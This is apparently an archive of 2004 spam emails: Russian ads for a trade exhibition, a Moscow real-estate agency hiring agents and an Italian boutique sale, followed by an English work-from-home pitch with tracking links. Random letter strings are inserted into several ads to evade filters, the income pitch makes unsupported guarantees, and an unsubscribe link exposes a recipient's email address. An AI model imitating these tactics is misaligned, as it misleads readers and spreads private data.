Будем рады приветствовать Вас на нашем стенде.
По вопросам посещения выставки, получения пригласительных билетов и поставки указанной продукции просим обращаться по тел.: (095) 782-4900; 310-7771; 119-9888; 775-2052
P.S. Данная рассылка является разовой. Просим прощения если данное письмо Вас не заинтересовало.
03.09.2004 в 08:09
МЫ-РАСШИРЯЕМСЯ (открываем новый офис) !
Самое прогрессивное агентство недвижимости Москвы. Приглашаем опытных агентов (до 50%), брокеров (до 85%) и сложившиеся коллективы (50%) в отделы вторичного жилья и коммерческой недвижимости.
Приглашаем руководителей отделов (оклад от 1000$). Особые условия для менеджера с группой сотрудников. Всесторонняя рекламная поддержка-печать, телевидение, радио, расклейка. Формирование рекламной стратегии под конкретную группу. Инвестируем средства в выкуп квартир, офисов, земельных участков. Расселяем на свои деньги.
Большой объем работ. Высокий процент оплаты (30-70%). Честные комиссионные. Бригадный метод работы. Гарантированный заработок. Высокоскоростной интернет, цифровая телефония, оборудованные рабочие места, самая большая база данных в Москве по вторичной и коммерческой недвижимости (130 000 объектов и клиентов).
Офис - м.Цветной бульвар, Садовая-Самотечная, д.15/1, офис 310.
Телефоны: 208-78-88,208-78-05
аабеорозап ьзачсандгб нпиотй оинвнвотоуа
03.09.2004 в 08:10
Супер акция 3=1!
В бутике "Палермо" на Б. Полянке, д. 3/9 лучшие имена Италии
МУЖСКАЯ КОЛЛЕКЦИЯ: Um.Bilancioni, U.Vallati, Corneliani, Verri, C.Paciotti, A.Testoni кьтд ичн аоуаайго
ЖЕНСКАЯ КОЛЛЕКЦИЯ: Angelo Marani, Les Copains, Blugirl, Blumarin beachwear, Belucci, S.Kelian, Andrea Pfister. чр аыжбыл тнди
СПЕЦИАЛЬНОЕ ПРЕДЛОЖЕНИЕ !
Christian Dior, EL Vaquero, Antonio Marras - 70%
Уникальная акция продолжается до 10 сентября
Бутик "Палермо" Б. Полянка 3\9, тел.: 913-8З8З
БУДЕМ РАДЫ ВАС ВИДЕТЬ!
Предъявив нашу рекламу, при покупке Вы получите постоянную 10% дисконтную карту на новую коллекцию
омнн егм яеоокаяоте аанл моелднбньд
03.09.2004 в 08:14
http://fullofsun.com/t/21/879/12800914/1630
It's both Simple and Easy...you have nothing to lose. We guarantee you won▓t be disappointed!
LOCAL POSITIONS ARE GOING FAST, SO HURRY!
Click here to contact us for more information.
http://fullofsun.com/t/21/879/12800914/1630
Respond now and get access to our FREE Presentation Pack that reveals everything. No obligation.
--------------------------------------------------------------
To stop receiving offers from the advertiser please visit the site using the link above and enter your email address in the opt out box at the bottom of the page.
Or write to the address below.
iCashBiz
1648 Taylor Road, #312
Port Orange, Florida 32128
To unsubscribe from this email list please follow the unsubscribe instructions below.
--------------------------------------------------------------===============================================================================
Unsubscribe Department
Fullofsun
PO Box 278166
Miramar, FL 33027
Your privacy is extremely important to us. As a leader in permission-based email promotions, we are committed to delivering a highly rewarding experience with great opportunities. This message may be a recurring mailing. To clear your name from our database, click below.
http://fullofsun.com/u/879/21/starkjen%40mtu-net.ru/1
04.09.2004 в 12:11
04.09.2004 в 12:12